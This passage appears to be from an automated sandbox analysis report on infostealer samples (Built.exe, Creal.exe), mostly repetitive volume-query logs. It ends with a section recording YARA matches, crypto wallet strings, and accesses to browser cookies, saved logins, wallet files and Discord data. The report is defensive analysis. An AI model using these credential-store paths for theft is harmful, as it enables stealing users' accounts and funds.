              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_bz2.pyd VolumeInformation
              Source: C:\Users\user\Desktop\Built.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_sqlite3.pyd VolumeInformation
              Source: C:\Users\user\Desktop\Built.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_socket.pyd VolumeInformation
              Source: C:\Users\user\Desktop\Built.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\select.pyd VolumeInformation
              Source: C:\Users\user\Desktop\Built.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_ssl.pyd VolumeInformation
              Source: C:\Users\user\Desktop\Built.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_hashlib.pyd VolumeInformation
              Source: C:\Users\user\Desktop\Built.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_queue.pyd VolumeInformation
              Source: C:\Users\user\Desktop\Built.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\unicodedata.pyd VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\_ctypes.pyd VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\_bz2.pyd VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\_lzma.pyd VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\_wmi.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\pyexpat.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\jaraco VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\Desktop\Creal.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe Code function: 0_2_00007FF6063A400C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6063A400C
              Source: C:\Users\user\Desktop\Creal.exe Code function: 2_2_00007FF6D9265C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,2_2_00007FF6D9265C00
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe Code function: 0_2_00007FF606386768 GetVersionExW,0_2_00007FF606386768

              Stealing of Sensitive Information

              Source: Yara match File source: 00000003.00000003.2109058666.00000124EBC34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000003.00000003.2109058666.00000124EBC32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: Built.exe PID: 2760, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: Built.exe PID: 2536, type: MEMORYSTR
              Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI27602\rarreg.key, type: DROPPED
              Source: Yara match File source: 00000019.00000002.3354239060.00000227B8F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxxz
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Exodusz
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Creal.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\Creal.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\Creal.exe File opened: C:\Users\user\AppData\Local\Discord
              Source: C:\Users\user\Desktop\Creal.exe File opened: C:\Users\user\AppData\Local\DiscordCanary
              Source: C:\Users\user\Desktop\Creal.exe File opened: C:\Users\user\AppData\Local\DiscordPTB
              Source: C:\Users\user\Desktop\Creal.exe File opened: C:\Users\user\AppData\Local\DiscordDevelopment
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File opened: C:\Users\user\AppData\Local\Discord
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File opened: C:\Users\user\AppData\Local\DiscordCanary
